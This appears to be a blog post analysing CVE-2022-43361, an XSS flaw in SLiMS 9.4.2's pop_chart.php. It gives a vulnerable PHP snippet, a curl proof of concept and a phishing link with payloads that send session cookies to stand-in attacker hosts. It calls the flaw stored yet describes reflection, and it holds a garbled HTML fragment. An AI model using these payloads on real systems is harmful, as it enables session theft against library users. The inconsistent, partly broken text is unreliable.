CVE-2022-43361 - XSS Vulnerability in Senayan Library Management System v9.4.2 (pop_chart.php) - In-depth Analysis and Exploitation

Cross-Site Scripting (XSS) vulnerabilities are still among the most common and dangerous problems in web applications today. CVE-2022-43361 is a classic example found in Senayan Library Management System (SLiMS) version 9.4.2, which is widely used by libraries around the world for cataloging and managing their resources.

This post will walk you through what CVE-2022-43361 is, where it’s located, the risk it brings, and—most importantly—show, in plain language, how exploitation works, including code snippets and examples.

What is SLiMS (Senayan Library Management System)?

SLiMS is an open source library management software. It helps with cataloging, circulation, member management etc. Organizations using it can be schools, colleges, public libraries, and anyone needing to manage books and members.

Overview of the Vulnerability

CVE-2022-43361 is a stored XSS vulnerability within the pop_chart.php component in SLiMS 9.4.2. An attacker can inject malicious JavaScript code, which can then be executed in other users’ browsers. Such attacks can result in session theft, defacement, or even redirection to malicious sites.

Vulnerability Type: Cross-site scripting (XSS)

- Affected file: /modules/reporting/pop_chart.php

SLiMS Version affected: 9.4.2 (possibly earlier versions as well)

- CVE-ID: CVE-2022-43361

How Does the Vulnerability Happen?

When a web page echoes user input without properly sanitizing it, an attacker can inject HTML or JavaScript code. If this code is rendered by other users' browsers, it executes with their privileges.

In SLiMS v9.4.2, pop_chart.php takes one or more parameters (like data) from the URL and reflects them directly into the page, without validation.

Reviewing pop_chart.php code (simplified, based on public reports)

<?php
// Extract a GET parameter and display it
echo $_GET['data'];
?>

You can inject arbitrary HTML/JS into the data parameter, for instance

http://target.site.com/slims9_bulian/modules/reporting/pop_chart.php?data=%3Cscript%3Ealert('XSS')%3C/script%3E

This decodes to

<script>alert('XSS')</script>

</h2><p>    fetch('<a href="https://attacker.site/steal?c='+document.cookie" rel="nofollow">https://attacker.site/steal?c='+document.cookie</a>)<br>

Below is a minimal proof-of-concept (POC) exploit using curl

curl 'http://target.site.com/slims9_bulian/modules/reporting/pop_chart.php?data=<script>alert("Hacked")</script>';

Or embed this link in an email/phishing page

<a href="http://target.site.com/slims9_bulian/modules/reporting/pop_chart.php?data=<script>document.location='https://evil.site/'+document.cookie</script>">;
  Click to view Library Report!
</a>

When a victim clicks, their session cookie is leaked to the attacker.

Impact

- Session Hijacking: Attacker can impersonate a library user/admin.

Remediation

Patch status: At time of CVE release, no universal patch. Check SLiMS GitHub for new releases.

References

- CVE-2022-43361 – NVD Record
- SLiMS official site
- GitHub - SLiMS Source Code
- CVE-2022-43361 Exploit details (PacketStorm)

Final Thoughts

CVE-2022-43361 is a clear example of how missed data sanitization leads to severe vulnerabilities. Even for software used in niche sectors like libraries, security can’t be an afterthought.

If you run SLiMS, check your version and patch immediately. Devs should sanitize all output, and users should never trust data from URLs without verifying first.

Timeline

Published on: 11/01/2022 19:15:00 UTC
Last modified on: 11/02/2022 15:30:00 UTC